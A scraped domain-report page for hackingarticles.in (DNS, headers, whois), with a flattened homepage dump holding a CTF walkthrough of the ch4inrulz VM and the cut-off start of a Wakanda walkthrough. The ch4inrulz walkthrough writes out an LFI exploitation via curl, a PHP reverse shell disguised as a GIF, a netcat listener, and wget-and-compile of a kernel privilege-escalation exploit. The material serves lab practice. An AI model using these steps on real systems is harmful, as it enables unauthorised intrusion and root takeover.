hackingarticles.in-hacking articles

Technical data of the hackingarticles.in

Geo IP provides you such as latitude, longitude and ISP (Internet Service Provider) etc. informations. Our GeoIP service found where is host hackingarticles.in. Currently, hosted in Singapore and its service provider is CloudFlare Inc. .

Latitude:	1.2896699905396
Longitude:	103.85006713867
Country:	Singapore (SG)
City:	Singapore
Region:	Singapore
ISP:	CloudFlare Inc.

HTTP Header Analysis

HTTP Header information is a part of HTTP protocol that a user's browser sends to called cloudflare containing the details of what the browser wants and will accept back from the web server.

X-Powered-By:	PHP/7.1.18
Transfer-Encoding:	chunked
Set-Cookie:	__cfduid=d0c40e59b29c1a9dff378e0c1c840aa791534226815; expires=Wed, 14-Aug-19 06:06:55 GMT; path=/; domain=.hackingarticles.in; HttpOnly
Content-Encoding:	gzip
Vary:	Accept-Encoding,User-Agent
Server:	cloudflare
Connection:	keep-alive
Link:	; rel="https://api.w.org/", ; rel=shortlink
Date:	Tue, 14 Aug 2018 06:06:56 GMT
CF-RAY:	44a13cfb37199206-EWR
Content-Type:	text/html; charset=UTF-8

DNS

soa:	duke.ns.cloudflare.com. dns.cloudflare.com. 2028104587 10000 2400 604800 3600
ns:	duke.ns.cloudflare.com. kay.ns.cloudflare.com.
ipv4:	IP:104.28.7.89 ASN:13335 OWNER:CLOUDFLARENET - Cloudflare, Inc., US Country:US IP:104.28.6.89 ASN:13335 OWNER:CLOUDFLARENET - Cloudflare, Inc., US Country:US
ipv6:	2400:cb00:2048:1::681c:659//13335//CLOUDFLARENET - Cloudflare, Inc., US//US 2400:cb00:2048:1::681c:759//13335//CLOUDFLARENET - Cloudflare, Inc., US//US
txt:	"v=spf1 a mx ptr include:secureserver.net ~all"
mx:	MX preference = 20, mail exchanger = alt1.aspmx.l.google.com. MX preference = 10, mail exchanger = aspmx.l.google.com. MX preference = 30, mail exchanger = aspmx2.googlemail.com.

HtmlToText

hacking articles raj chandel's blog author web penetration testing penetration testing courses we offer bug bounty ceh chfi my books gmail hacking footprinting you tube hacking facebook hacking donate us hack the ch4inrulz: 1.0.1 (ctf challenge) posted in ctf challenges on august 12, 2018 by raj chandel with 0 comment hello readers and welcome to another ctf challenge. this vm is made by frank tope as you’ll see in the very homepage on the server’s website (his resume). nice touch, if i might add. anyhow, you can download this vm from vulnhub here . the aim of this lab is to get root and read the congratulatory message written in the flag. i would rate the difficulty level of this lab to be intermediate. although, there were no buffer overflows or unnecessary exploit development, yet it did make us think a little. steps involved: port scanning and ip clutching. directory busting port 80. directory busting port 8011. discovering lfi vulnerability. discovering an html backup file. cracking password hash logging in /development uploading a php shell disguised as gif file. bypassing the check and triggering the file to get a netcat shell. privilege escalation to get flag. alright then, let’s head into the vm all the way in. first step is as always, running netdiscover on the vm to grab the ip address. in my case the ip was 192.168.1.103. once the ip was found, we ran nmap aggressive scan to enumerate all the open ports. what was there to wait for after we saw port 80 open! we headed straight into the browser and a webpage got displayed which looked like a single page resume. after not finding much, we chose to ran directory buster dirb. robots.txt seemed interesting at first but it had nothing at all. another directory was /development. it looked like a testing site since it asked for the authentication. we then chose to look into port 8011, after finding not much of the info. it looked like a backend to development directory. we ran one more dirb scan on this port. we found an interesting directory called /api. we opened it in the browser immediately. we modified the url parameter to /api/<api-name> but only one api seemed to be working and that was files_api.php a message said “no parameter called file passed to me.” it gave us a hint that we had to pass a parameter called file. 192.168.1.103:8011/api/files_api.php?file=/etc/passwd 1 192.168.1.103 : 8011 / api / files_api . php ? file = / etc / passwd haha. they got us. but still there was another thing left to try—by passing parameter through curl. curl – x post –d "file=/etc/passwd" http://192.168.1.103:8011/api/files_api.php 1 curl – x post – d "file=/etc/passwd" http : //192.168.1.103:8011/api/files_api.php as you can see, lfi is present here! now, we tried some methods, put our hands here and there but nothing worked with this lfi. meanwhile, another thing that got our attention was the development server. you had a development site, you have a development server, and hence there would be more than one html files or copies of html files (backups). one such common file is index.html.bak it was an arrow in the dark but it hit the bullseye! we saved it and read it using cat utility. it had a password hash! it took us no time to copy this in a text files called hash.txt and run john the ripper on it. it surely were the credentials to /development authentication. frank:frank!!!! and it opened up like a beautiful treasure! the message on this page said that the uploader tool was only half completed. so, we went to /uploader directory the uploader had a security check for images only (jpg, png, gif) and a size limitation too. so, here is what we did. traverse to the directory: /usr/share/webshells/php/php-reverse-shell.php open it with text editor and add gif98 in the first line and save this file as shell.gif now, what this will do is that it will trick the uploader in believing the file is gif when in reality, it is a php reverse shell. so, we upload shell.gif using the uploader and the following message was received. now, the author said file was uploaded to his uploads path. let’s get a little perspective here. website’s name: frank’s website uploader’s name: frank uploader. first message on website: i love patterns it took a while for us but we guessed it in the end, the upload’s directory would be named frank uploads. we tried many permutations for this directory like: frankupload, frankuploads, franksuploads etc. but the one that seemed to hit was frankuploads. this step was tedious and time consuming as there was no straight connection from anywhere to this directory. now, all was left to trigger this file. we know for a fact that double clicking won’t do us any good so we used curl once again to get shell. we activated netcat on a terminal side by side and typed this following curl command: curl –x post –d "file=/var/www/development/uploader/frankuploads/shell.gif" http://192.168.1.103:8011/api/files_api.php 1 curl – x post – d "file=/var/www/development/uploader/frankuploads/shell.gif" http : //192.168.1.103:8011/api/files_api.php on other terminal, we had activated netcat: nc -lvp 1234 1 nc - lvp 1234 as soon as curl triggered the lfi vulnerability and requested for shell.gif, we got a netcat session! id python –c 'import pty;pty.spawn("/bin/bash");' uname –a 1 2 3 id python – c 'import pty;pty.spawn("/bin/bash");' uname – a after a bit of surfing, we found a linux kernel exploit for version 2.6 searchsploit 15285 cd desktop cp /usr/share/exploitdb/exploits/linux/local/15285.c . python –m simplehttpserver 80 1 2 3 4 searchsploit 15285 cd desktop cp / usr / share / exploitdb / exploits / linux / local / 15285.c . python – m simplehttpserver 80 on our vm shell, we downloaded this exploit, compiled it and ran it to get root! cd tmp wget http://192.168.1.107/15285.c gcc 15285.c –o 15285 chmod 777 15285 ./15285 1 2 3 4 5 cd tmp wget http : //192.168.1.107/15285.c gcc 15285.c – o 15285 chmod 777 15285 . / 15285 voila! we got root! cd root ls cat root.txt 1 2 3 cd root ls cat root . txt and there it was, the flag. hope you enjoyed because we surely ddi! author: harshit rajpal is an infosec researcher and a left and right brain thinker. contac t here hack the wakanda: 1 (ctf challenge) posted in ctf challenges on august 11, 2018 by raj chandel with 0 comment hello friends! today we are going to take another ctf challenge known as wakanda and it is another capture the flag challenge provided for practice. so let’s try to break through it. but before please note that you can download it from here . security level: intermediate flags: there are three flags (flag1.txt, flag2.txt, root.txt) penetrating methodologies network scanning (nmap, netdiscover) http service enumeration exploiting lfi using php filter decode the base 64 encoded text for password ssh login get 1 st flag finding files owned by devops overwrite antivirus.py via malicious python code get netcat session get 2 nd flag sudo privilege escalation exploit fake pip get the root access and capture the 3rd flag walkthrough let’s start off with scanning the network to find our target. netdiscover 1 netdiscover we found our target –> 192.168.1.124 our next step is to scan our target with nmap. nmap -p- -a 192.168.1.124 1 nmap - p - - a 192.168.1.124 the nmap output shows us that there are 4 ports open: 80 (http), 111 (rpc), 333(ssh), 48920(rpc) browsed the url http://192.168.1.124 and poked around; however we were not able to get any significant clues to move forward we didn’t find anything on the webpage so we use dirb to enumerate the directories. dirb http://192.168.1.124 1 dirb http : //192.168.1.124 all the pages that we find in the dirb scan has size zero and we don’t find any content on any of the pages. we take a look at the source page of the index file and we find a “lang” parameter commented inside the page. we use the “lang” parameter, just like it was shown in the page and find the text has been converted into french. now w

URL analysis for hackingarticles.in

http://www.hackingarticles.in/e-book/
http://www.hackingarticles.in/penetration-testing/
http://www.hackingarticles.in/author/raaz/
http://www.hackingarticles.in/category/nmap/
http://www.hackingarticles.in/category/methods-of-windows-password-hacking/
http://www.hackingarticles.in/category/website-hacking/
http://www.hackingarticles.in/e-book/you-tube-hacking/
http://www.hackingarticles.in/hack-the-box-holiday-walkthrough/
http://www.hackingarticles.in/donate-us/
http://www.hackingarticles.in/category/trojans-keyloggers/
http://www.hackingarticles.in/category/others/
http://www.hackingarticles.in/category/domain-hacking-tricks/
http://www.hackingarticles.in/category/cyber-forensics-tricks/
http://www.hackingarticles.in/hack-the-ch4inrulz-1-0-1-ctf-challenge/#respond
http://www.hackingarticles.in/hack-the-wintermute-1-ctf-challenge/#respond

Whois Information

Whois is a protocol that is access to registering information. You can reach when the website was registered, when it will be expire, what is contact details of the site with the following informations. In a nutshell, it includes these informations;

Domain Name: HACKINGARTICLES.IN
Registry Domain ID: D4232824-AFIN
Registrar WHOIS Server:
Registrar URL:
Updated Date: 2018-04-22T06:13:05Z
Creation Date: 2010-05-22T09:03:38Z
Registry Expiry Date: 2020-05-22T09:03:38Z
Registrar Registration Expiration Date:
Registrar: Endurance Domains Technology LLP
Registrar IANA ID: 801217
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Reseller:
Domain Status: clientTransferProhibited
Registrant Organization: Gunjan Resort
Registrant State/Province: Delhi
Registrant Country: IN
Name Server: DUKE.NS.CLOUDFLARE.COM
Name Server: KAY.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form https://www.icann.org/wicf/)
>>> Last update of WHOIS database: 2018-08-30T14:14:18Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

Access to .IN WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the .IN registry database. The data in this record is provided by .IN Registry for informational purposes only, and .IN does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. .IN reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.

The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.

  REFERRER http://whois.registry.in

  REGISTRAR INRegistry

SERVERS

  SERVER in.whois-servers.net

  ARGS hackingarticles.in

  PORT 43

  TYPE domain

DOMAIN

  NAME hackingarticles.in

  HANDLE D4232824-AFIN

  CREATED 2010-05-22

STATUS
clientTransferProhibited

NSERVER

  DUKE.NS.CLOUDFLARE.COM 173.245.59.110

  KAY.NS.CLOUDFLARE.COM 173.245.58.125

OWNER

  ORGANIZATION Gunjan Resort

ADDRESS

  STATE Delhi

  COUNTRY IN

  REGISTERED yes

Go to top

hackingarticles.in Report : Visit Site

Technical data of the hackingarticles.in

HTTP Header Analysis

DNS

HtmlToText

URL analysis for hackingarticles.in

Whois Information

Mistakes